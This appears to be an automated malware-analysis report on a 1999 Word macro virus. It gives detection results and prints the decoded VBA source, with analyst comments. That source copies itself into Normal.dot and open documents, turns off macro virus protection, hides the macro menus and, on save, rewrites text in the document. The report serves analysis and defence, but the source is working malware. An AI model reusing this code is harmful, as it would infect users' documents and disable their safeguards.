Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e5ab495cd8a76bf7…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 36.0 KB
Created: 2000-02-05 01:15:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: d66651361bc22fb1a76fdb8d728ef469
SHA-1: 9f1710bac26d1e5251aceb9e22db21c33d0bc3f3
SHA-256: e5ab495cd8a76bf7ccae5c9341b94f978d3be1e84dd2ae8aa76c1ac43f75935f
Risk score: 200

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with multiple critical detections, including 'Doc.Trojan.Opey-18'. The presence of legacy WordBasic and VBA macros, specifically an 'AutoOpen' macro, indicates an attempt to execute malicious code upon opening the document. The VBA script attempts to copy itself into the Normal template and any other open documents, suggesting a self-propagation or infection mechanism.

Heuristics (4)

  • ClamAV: Doc.Trojan.Opey-18 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Opey-18
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6285 bytes
SHA-256: 15f08f71da8c82f8f2ea6183c4cbf8443327576b9d57c8f19cb34e091daeb065
Detection: ClamAV: Doc.Trojan.Opey-14
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Kinetic"
'This virus was made in the Philippines
'Let's be proud of it! (guapito) p/n: D_NH691
'(c) 1999 by Kinetic Stab of Hackerz Networx
'(www.hnetworx.iscool.net) or (surf.to/hacknet.com)
'Virus Name: TangnalakiU

Sub Ikaw()
    On Error Resume Next
    Call Kinetic
    ' [analyst note] Infection routine: ensure the "Kinetic" module lives in Normal.dot and in every open document
    NTInfected = False
    For i = NormalTemplate.VBProject.VBComponents.Count To 1 Step -1
        clan = NormalTemplate.VBProject.VBComponents(i).Name
        If clan = "Kinetic" Then NTInfected = True
        If (clan <> "Kinetic") And (clan <> "ThisDocument") Then Application.OrganizerDelete Source:=NormalTemplate.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
    Next i
    For Each opendoc In Documents
        ODInfected = False
        With opendoc
            For j = opendoc.VBProject.VBComponents.Count To 1 Step -1
                clan = opendoc.VBProject.VBComponents(j).Name
                If clan = "Kinetic" Then ODInfected = True
                If (clan <> "Kinetic") And (clan <> "ThisDocument") And (clan <> "Reference to Normal") Then Application.OrganizerDelete Source:=opendoc.FullName, Name:=clan, Object:=wdOrganizerObjectProjectItems
            Next j
            If ODInfected = False Then
                Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=opendoc.FullName, Name:="Kinetic", Object:=wdOrganizerObjectProjectItems
                opendoc.SaveAs FileName:=opendoc.FullName
            End If
        End With
    Next opendoc
    If NTInfected = False Then
        Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="Kinetic", Object:=wdOrganizerObjectProjectItems
        NormalTemplate.Save
    End If
End Sub
Sub Kinetic()
    On Error Resume Next
    Application.UserName = "Kinetic Stab"
    Application.UserAddress = "www.hnetworx.iscool.net"
    Application.UserInitials = "Kinetic"
    With Dialogs(wdDialogFileSummaryInfo)
        .Author = "Kinetic Stab"
        .Title = "This One is for MaIdCr"
        .Subject = "Is it okay if I call you mine?"
        .Company = "Hackerz Networx"
        .Comments = "Tangnalakiu"
        .Execute
    End With
    With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
    End With
    With ActiveDocument
        .ReadOnlyRecommended = False
    End With
    On Error Resume Next
    CommandBars("Visual Basic").Visible = False
    CommandBars("Visual Basic").Enabled = False
    CommandBars("Visual Basic").Protection = msoBarNoChangeVisible
    CommandBars("Visual Basic").Protection = msoBarNoCustomize
    CommandBars("Tools").Controls("Macro").Enabled = False
    CommandBars("Tools").Controls("Customize...").Delete
    CustomizationContext = NormalTemplate
End Sub
Sub FileSave()
    On Error Resume Next
    ' [analyst note] Payload: replaces every whole-word "The" with "Kinetic", then hides the Undo/Replace menu entries
    Selection.HomeKey Unit:=wdStory
    Selection.Find.ClearFormatting
    Selection.Find.Replacement.ClearFormatting
    With Selection.Find
        .Text = "The"
        .Replacement.Text = "Kinetic"
        .Forward = True
        .Wrap = wdFindContinue
        .Format = False
        .MatchCase = False
        .MatchWholeWord = True
        .MatchAllWordForms = False
    End With
    Selection.Find.Execute Replace:=wdReplaceAll
    CommandBars("edit").Controls("Undo VBA-Find.Execute").Delete
    CommandBars("edit").Controls("Repeat Replace...").Delete
    CommandBars("edit").Controls("Replace...").Delete
    If ActiveDocument.Saved = False Then ActiveDocument.Save

    Call Ikaw
    ActiveDocument.Save
End Sub
Sub FileClose()
    On Error Resume Next
... (truncated)